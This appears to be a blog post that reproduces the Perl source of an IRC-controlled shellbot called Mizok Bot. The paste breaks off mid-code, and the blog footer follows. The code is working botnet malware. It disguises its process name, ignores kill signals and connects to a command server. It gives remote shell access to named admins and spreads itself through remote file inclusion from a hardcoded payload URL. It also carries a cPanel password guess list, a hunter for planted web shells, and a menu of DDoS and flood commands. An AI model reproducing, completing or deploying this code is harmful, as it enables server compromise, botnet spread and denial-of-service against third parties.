Code :
==========================================================
#!/usr/bin/perl
#system 'cd /tmp;rm -rf *';
#
# Mizok Bot V3.2 PRiVaTE Sh3llBoT
#
# Last edited : 12/2/2010
#
#[@[PitBull Bot V5 Commands List]@]
#[@-----[Shellbot/Hacking Based]-----@]
#!bot @admins
#!bot @spread
#!bot @milw0rm
#!bot @packetstorm
#!bot @portscan
#!bot @logcleaner
#!bot @md5
#!bot @sendmail
#!bot @vnc
#!bot @boxip
#!bot @socks5
#!bot @cleartmp
#!bot @portchk
#!bot @proxy
#!bot @rootable
#!bot @modules
#!bot @cpanel
#!bot @visit
#!bot @shellfind
#[@-----[IRC Based]-----@]
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @quit
#!bot @voice
#!bot @devoice
#!bot @halfop
#!bot @dehalfop
#!bot @op
#!bot @deop
#!bot @owner
#!bot @deowner
#[@-----[DDos Based]-----@]
#!bot @udpflood
#!bot @httpflood
#!bot @sqlflood
#[@-----[Flooding Based]-----@]
#!bot @msgflood
#!bot @dccflood
#!bot @ctcpflood
#!bot @noticeflood
#!bot @channelflood
#!bot @maxiflood
#[@[PitBull Bot V5 Commands List]@]
#
# Sh3llBoT
#
######################
#print " After installation, Linux requires configuration and systems administration. Corporate systems need monitoring, backups, updates, as well as system and user management. Ubuntu (apt), CentOS, Fedora and Red Hat (rpm/YUM) server and desktop systems adminstration are covered by this script. Please dont exit the script or it will result in a broken linux partition";
######################
# Specify your data:
#--------------------------------------------------------------#
my $max_lines= '10';
my $sleeping= '3';
my $prefix = "shellbot"; # "!" is included :)
my $spread = "http://www.theblackhole.us/forum/chat/inc/cmses/bind/s.txt";
my @admins = ("Vicktor");
my @hostauth= ("Vicktor.ro");
#--------------------------------------------------------------#
$server= 'master.indoirc.net' unless $server;
my $port= '6667';
my @channel= ("#Vicktor");
my @nickname = ("XDCC|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = 'xdcc';
chop (my $realname = "VickT');
#--------------------------------------------------------------#
my $httpmodule;
my $usermodule;
my $lwpmodule;
my $filemodule;
#--------------------------------------------------------------#
my @cpanelpasswds = ("1","12","967qeikt","123","1234","12345","123456","1234567","12345678","123456789","1234567890","admin","root",
"pass","passwd","password","Pass","Passwd","PassWd","PassWord","pwd","login","Admin","admin","test","123123","1212",
"12341234","zxcvbnm","zxcvbn","zxcvb","zxcv","zxc","q1w2e3r4","q1w2e3","q1w2e3r4t5","1q2w3e4r5t","1q2w3e4r","1q2w3e",
"demo","morgan","ferrari","italia","usa","clinton","dart","call","asdf","asdfg","asdfgh","qazwsx","qazxsw","qwertyu",
"qwertyuiop","qwertyuio","qwertyu","qwerty","qwert","qwer","james","hosting","temp","test1","test12","test123","tester",
"testing","cpanel","default","Login","admin.","cpanels","web","master","webmaster","dark","support","darby","mail",
"dick","mary","evil","nissan","toyota","kingkong","superman","super","supra","data","service","server","weed","abc",
"abc123","hello","terror","binladen","europe","website","mypass","pass1","pass12","pass123","pass1234","passwd1");
#--------------------------------------------------------------#
# End here :)
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
eval "use HTTP::Request;"; if ($@) {
$httpmodule= " 4No";
}
else{
$httpmodule= " 4Yes";
}
eval "use LWP::UserAgent;"; if ($@) {
$usermodule= " 4No";
}
else{
$usermodule= " 4Yes";
}
eval "require LWP;"; if ($@) {
$lwpmodule= " 4No";
}
else{
$lwpmodule= " 4Yes";
}
eval "use FileHandle;"; if ($@) {
$filemodule= " 4No";
}
else{
$filemodule= " 4Yes";
}
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
#Connect
$server="$ARGV[0]" if $ARGV[0];
# Real psx! - by xeQt.
my $uid=`id -u`;
if ($uid =~ /^0$/)
{
$0=$xeQters."\0"x16;;
chdir($rootpath);
}
else
{
@processer=`ps x|grep -E "http|httpd|apache|apache2|mysql|postgrep|smbd"`; # Grab from real ps!
foreach $lines (@processer)
{
if (($lines =~ /\/(.+)/)&&($lines !~ /grep/i)&&($lines !~ /perl/i))
{
if (($lines!~/wget/i)&&($lines!~/curl/i)&&($lines!~/fetch/i)&&($lines!~/GET/i)&&($lines!~/lwp-download/i))
{
$bg=$1;
}
}
if (($bg =~ /^\//i) || ($bg =~ /^\/\//i) || ($bg =~ /^[.+?]$/i))
{
$bg="$bg";
}
else
{
$bg="/$bg";
}
if ((length($bg) <= 3) || ($bg =~ /.txt$/i)) { $bg=$fakeps[rand scalar @fakeps]; } $0="$bg"."\0"x16;; chdir($userpath); } } my $pid=fork; exit if $pid; die "Error: Fork(): $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {#342
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.31 The_PitBull\001"); } if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth ) { if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) { if ($onde eq "$meunick"){ shell("$pn", "$args"); } #-#-#-#-#-#-#-#-# # PREFIX # #-#-#-#-#-#-#-#-# if ($args =~ /^(\Q$meunick\E|\!$prefix)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; if ($arg =~ /^\!(.*)/) { ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); } elsif ($arg =~ /^\@(.*)/) { $ondep = $onde; $ondep = $pn if $onde eq $meunick; bfunc("$ondep","$1"); } else { shell("$onde", "$arg"); } } } } } #-#-#-#-#-#-#-#-# # NICKNAME OPT.# #-#-#-#-#-#-#-#-# elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($meunick)) { $meunick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$meunick".int rand(999999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $meunick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach my $canal (@channel) { sendraw("JOIN $canal ddosit"); } } } sub bfunc { my $printl = $_[0]; my $funcarg = $_[1]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { #-#-#-#-#-#-#-#-# # Commands # #-#-#-#-#-#-#-#-# # Show commands of the bot. if ($funcarg =~ /^commands/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] "); sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Shellbot/Hacking Based]----- 4@ 12 ] "); sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1admins "); sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1spread ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1milw0rm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1packetstorm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portscan ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1logcleaner ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1md5 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sendmail ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1vnc ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1boxip ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1socks5 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cleartmp ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portchk ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1proxy ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1rootable ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1modules ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cpanel ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1visit ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1shellfind ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[IRC Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1join <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1part <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1quit ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1voice ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1devoice ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1halfop ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dehalfop ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1op ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1deop ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[DDos Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1udpflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1httpflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sqlflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Flooding Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1msgflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dccflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1ctcpflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1noticeflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1channelflood");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1maxiflood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] ");
}
# Shell finder based on the code of DiA/RRLF.
if ($funcarg =~ /^shellfind\s+(.*)/) {
my $type=$1;
my @searchTerm;
my @checkTerm;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Started for finding 4 ".$type." 12shell ");
if($type eq "r57") {
push(@searchTerm, "inurl:r57.php");
push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"");
push(@searchTerm, "intitle:r57shell");
push(@checkTerm, "r57");
push(@checkTerm, "safe_mode");
}
elsif($type eq "c99") {
push(@searchTerm, "inurl:c99.php");
push(@searchTerm, "\"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\"");
push(@searchTerm, "intitle:\" - phpshell\"");
push(@searchTerm, "intitle:\" - c99shell\"");
push(@checkTerm, "c99");
push(@checkTerm, "Safe-mode");
}
elsif($type eq "mys") {
push(@searchTerm, "\"Auto error traping enabled\"");
push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
push(@checkTerm, "MyShell");
push(@checkTerm, "Echo commands");
}
elsif($type eq "phs") {
push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
push(@searchTerm, "\"Enable stderr-trapping?\"");
push(@checkTerm, "PHP Shell");
push(@checkTerm, "Choose new working");
}
elsif($type eq "phm") {
push(@searchTerm, "\"PHPShell by Macker\"");
push(@searchTerm, "\"[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\"");
push(@checkTerm, "Haxplorer");
push(@checkTerm, "PHPKonsole");
}
elsif($type eq "rem") {
push(@searchTerm, "intitle:\"phpRemoteView: \"");
push(@searchTerm, "\"REMVIEW TOOLS\"");
push(@checkTerm, "phpRemoteView");
push(@checkTerm, "perms");
}
my $userAgent = LWP::UserAgent->new;
$userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
my @resultLinks;
foreach(@searchTerm) {
my $isLastPage = 0;
for(my $gPage = 0; ; $gPage++) {
if($isLastPage == 1) { last; }
my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
my $gResource = $userAgent->request($gRequest);
if($gResource->is_success) {
my @gContent = split("
", $gResource->content);
if(@gContent < 10) { $isLastPage = 1; }; for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) { my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6); $shellLink = substr($shellLink, 0, index($shellLink, "\"")); my $sRequest = HTTP::Request->new(GET => $shellLink);
my $sResource = $userAgent->request($sRequest);
if($sResource->is_success) {
if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] 4 [".$type."] 12Link: 4 ".$shellLink." ");
}
}
}
sleep 20; #wait 20 seconds so google dont think we are a bot
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Google blacklisted! ");
}
}
}
}
# Show admins of the bot.
if ($funcarg =~ /^admins/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Admins 12] The Admins of the bot are : 4 @admins ");
}
# ModuleCheck to c wich we are using
if ($funcarg =~ /^modules/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] HTTP::Request: ".$httpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP::Useragent: ".$usermodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP: ".$lwpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] FileHandle: ".$filemodule." ");
}
# URL Visitor
if ($funcarg =~ /^visit\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visiting");
my $side=$1;
my $set = fix_url($side);
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; }
else {
eval "use HTTP::Request;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] HTTP::Request not found ");
}
eval "use LWP::UserAgent;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] LWP::UserAgent not found ");
}
my $siden=fix_url($side);
my $req=HTTP::Request->new(GET=>$siden);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
my $mrx=$response->content;
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visited 4 ".$siden.".");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Error: ".$siden."");
}
}
exit;
}
}
# Spread the bot on a rfi. Make sure that your $spread is configured right !.
if ($funcarg =~ /^spread\s+(.*)/) {
$vuln = $1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Spreading bot on : 4 $vuln");
my $shellurl="http://".$vuln.$spread."?";
my $reqz=HTTP::Request->new(GET=>$shellurl);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Bot is Spreaded on : 4 $vuln");
}
# MD5 Decrypter by my friend iNs ;).
if ($funcarg =~ /^md5\s+(.*)/) {
&ice($printl,$1);
&gdata($printl,$1);
&redn($printl,$1);
&xpz($printl,$1);
&ben($printl,$1);
&alim($printl,$1);
&cry($printl,$1);
}
# Get the latest bugs from milw0rm.
if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/
Tuesday, September 11, 2012
Mizok Bot V3.2 PRiVaTE Sh3llBoT
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment